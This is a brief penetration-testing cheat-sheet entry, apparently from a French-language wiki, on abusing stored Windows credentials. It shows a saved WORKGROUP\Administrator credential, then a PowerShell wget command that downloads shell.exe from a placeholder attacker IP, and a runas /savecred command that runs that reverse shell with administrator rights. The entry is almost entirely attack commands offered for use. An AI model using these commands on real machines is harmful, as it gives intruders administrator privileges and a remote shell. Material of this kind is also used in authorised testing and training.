🔑Stored Credentials
Exploitation
Target: Domain:interactive=WORKGROUP\Administrator
Type: Domain Password
User: WORKGROUP\Administrator# Téléchargement du reverse shell
powershell wget <attacker IP>/shell.exe -o shell.exe
# execution du reverse shell
runas /savecred /user:WORKGROUP\Administrator "C:\Users\<username>\Downloads\shell.exe"Mis à jour